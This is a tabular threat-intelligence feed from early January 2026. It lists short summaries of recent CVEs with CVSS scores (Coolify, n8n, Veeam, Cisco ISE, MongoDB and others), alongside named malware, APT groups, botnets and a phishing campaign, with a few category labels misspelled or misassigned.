| 8.1.26 | CVE-2025-66212 | (CVSS score: 10.0) - An authenticated command injection vulnerability in the Dynamic Proxy Configuration functionality allows users with server management permissions to execute arbitrary commands as root on managed servers | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-66213 | (CVSS score: 10.0) - An authenticated command injection vulnerability in the File Storage Directory Mount functionality allows users with application/service management permissions to execute arbitrary commands as root on managed servers | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-64419 | (CVSS score: 9.7) - A command injection vulnerability via docker-compose.yaml that enables attackers to execute arbitrary system commands as root on the Coolify instance | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-64420 | (CVSS score: 10.0) - An information disclosure vulnerability that allows low-privileged users to view the private key of the root user on the Coolify instance, allowing them to gain unauthorized access to the server via SSH and authenticate as the root user using the key | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-64424 | (CVSS score: 9.4) - A command injection vulnerability was found in the git source input fields of a resource, allowing a low-privileged user (member) to execute system commands as root on the Coolify instance | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-59156 | (CVSS score: 9.4) - An operating system command injection vulnerability that allows a low-privileged user to inject arbitrary Docker Compose directives and achieve root-level command execution on the underlying host | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-59157 | (CVSS score: 10.0) - An operating system command injection vulnerability that allows a regular user to inject arbitrary shell commands that execute on the underlying server by using the Git Repository field during deployment | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-59158 | (CVSS score: 9.4) - An improper encoding or escaping of the data that allows an authenticated user with low privileges to conduct a stored cross-site scripting (XSS) attack during project creation that's automatically executed in the browser context when an administrator later attempts to delete the project or its associated resource | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | RedLeaves | VULNEREBILITY | VULNEREBILITY | |
| 8.1.26 | UAT-7290 | UAT-7290 targets high value telecommunications infrastructure in South Asia | MALWARE | RAT |
| 8.1.26 | CVE-2026-20029 | A vulnerability in the licensing features of Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker with administrative privileges to gain access to sensitive information. This vulnerability is due to improper parsing of XML that is processed by the web-based management interface of Cisco ISE and Cisco ISE-PIC. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | NodeCordRAT | Malicious NPM Packages Deliver NodeCordRAT | MALWARE | RAT |
| 8.1.26 | CVE-2025-37164 | (CVSS score: 10.0) - A code injection vulnerability in HPW OneView that allows a remote unauthenticated user to perform remote code execution | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2009-0556 | (CVSS score: 8.8) - A code injection vulnerability in Microsoft Office PowerPoint that allows remote attackers to execute arbitrary code by means of memory corruption | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2026-21858 | A vulnerability in n8n allows an attacker to access files on the underlying server through execution of certain form-based workflows. A vulnerable workflow could grant access to an unauthenticated remote attacker. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2026-21877 | Under certain conditions, an authenticated user may be able to cause untrusted code to be executed by the n8n service. This could result in full compromise of the affected instance. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-59469 | (CVSS score: 7.2) - A vulnerability that allows a Backup or Tape Operator to write files as root | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-59468 | (CVSS score: 6.7) - A vulnerability that allows a Backup Administrator to perform RCE as the postgres user by sending a malicious password parameter | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-55125 | (CVSS score: 7.2) - A vulnerability that allows a Backup or Tape Operator to perform RCE as root by creating a malicious backup configuration file | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-59470 | Resolved in Veeam Backup & Replication 13.0.1.1071 | VULNEREBILITY | VULNEREBILITY |
| 7.1.26 | CVE-2026-0625 | Multiple D-Link DSL gateway devices contain a command injection vulnerability in the dnscfg.cgi endpoint due to improper sanitization of user-supplied DNS configuration parameters. | VULNEREBILITY | VULNEREBILITY |
| 7.1.26 | Prompt poaching | Prompt poaching runs rampant in extensions | HACKING | AI |
| 7.1.26 | CVE-2025-65606 | TOTOLINK EX200 firmware-upload error handling can activate an unauthenticated root telnet service | VULNEREBILITY | VULNEREBILITY |
| 7.1.26 | UAC-0184 | UAC-0184 | GROUP | GROUP |
| 7.1.26 | Kimwolf | A Broken System Fueling Botnets | BOTNET | BOTNET |
| 7.1.26 | CVE-2025-68668 | n8n is an open source workflow automation platform. From version 1.0.0 to before 2.0.0, a sandbox bypass vulnerability exists in the Python Code Node that uses Pyodide | VULNEREBILITY | VULNEREBILITY |
| 5.1.26 | VVS Discord | VVS Discord Stealer Using Pyarmor for Obfuscation and Detection Evasion | MALWARE | STEALER |
| 4.1.26 | Datebug APT campaign targeting governmental organizations in India | Researchers from Cyfirma have identified a targeted cyber espionage campaign attributed to Datebug APT group (aka APT36, Transparent Tribe). The campaign utilizes a deceptive delivery mechanism involving a weaponized Windows shortcut (LNK) files concealed within a ZIP archive, masquerading as a legitimate PDF to trick victims. | ALERTS | APT |
| 3.1.26 | OWASP Top 10 For Agentic Applications 2026 | The information provided in this document does not, and is not intended to, constitute legal advice. | REPORT | REPORT |
| 3.1.26 | CVE-2020-12812 | An improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below may result in a user being able to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username. | VULNEREBILITY | VULNEREBILITY |
| 3.1.26 | MongoDB Unauthenticated Attacker Sensitive Memory Leak | The Situation: A major vulnerability allows unauthenticated attackers to remotely leak sensitive data from MongoDB server memory. No login is required. | HACKING | HACKING |
| 2.1.26 | CVE-2025-59230 | An elevation-of-privilege (EoP) vulnerability in Windows’ Remote Access Connection Manager (RasMan) service. A locally authenticated attacker could exploit improper access control to escalate their privileges to SYSTEM level on affected Windows installations. | VULNEREBILITY | VULNEREBILITY |
| 2.1.26 | CVE-2025-10294 | A critical authentication bypass in the OwnID Passwordless Login plugin for WordPress. Due to improper validation of a shared secret, unauthenticated attackers could log in as arbitrary users, including administrators, without credentials. | VULNEREBILITY | VULNEREBILITY |
| 2.1.26 | CVE-2025-59295 | A heap-based buffer overflow in the Windows MSHTML/Internet Explorer component, enabling arbitrary code execution via specially crafted data sent over the network. | VULNEREBILITY | VULNEREBILITY |
| 2.1.26 | CVE-2025-14847 | Mismatched length fields in Zlib compressed protocol headers may allow a read of uninitialized heap memory by an unauthenticated client. This issue affects all MongoDB Server v7.0 prior to 7.0.28 versions | VULNEREBILITY | VULNEREBILITY |
| 2.1.26 | APT36 | APT36 : Multi-Stage LNK Malware Campaign Targeting Indian Government Entities | APT | APT |
| 2.1.26 | RondoDoX Botnet | RondoDoX Botnet Weaponizes React2Shell | BOTNET | BOTNET |
| 2.1.26 | Phishing Campaign Leverages Trusted Google Cloud Automation Capabilities to Evade Detection | This report describes a phishing campaign in which attackers impersonate legitimate Google generated messages by abusing Google Cloud Application Integration to distribute malicious emails that appear to originate from trusted Google infrastructure. | PHISHING | PHISHING |
|
|
|
|
|
|